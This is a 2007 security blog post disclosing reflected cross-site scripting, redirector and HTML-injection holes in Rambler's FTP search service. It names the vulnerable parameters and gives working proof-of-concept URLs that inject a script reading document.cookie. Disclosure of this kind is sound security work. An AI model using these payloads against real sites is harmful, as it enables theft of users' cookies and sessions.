Websecurity - Веб безпека

New bonus vulnerabilities at Rambler. These Cross-Site Scripting holes I found 01.06.2007. I found them when I looked for another holes for the project, after Rambler untimely fixed some that I prepared. Rambler need to behave itself properly (when participating in the project).

The holes at Rambler-FTP (ftpsearch.rambler.ru) in search results and advanced settings. And these are XSS vulnerabilities like in MOSEB-09: Vulnerabilities at Rambler (total 12 new holes).

Search results (search.html).

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• redirector
• html injection

The vulnerabilities are in words, ftype, form, what and sort1 parameters:
http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Advanced settings (advanced.html).

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• redirector
• html injection

The vulnerabilities are in words, pflx, pfli, dflx, dfli, sl and sh parameters:
http://ftpsearch.rambler.ru/db/ftpsearch/advanced.html?words=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: searching on ftp can be dangerous.

This entry was posted on 22:57 09.06.2007 and is filed under MOSEB. You can follow any responses to this entry through the RSS 2.0 feed.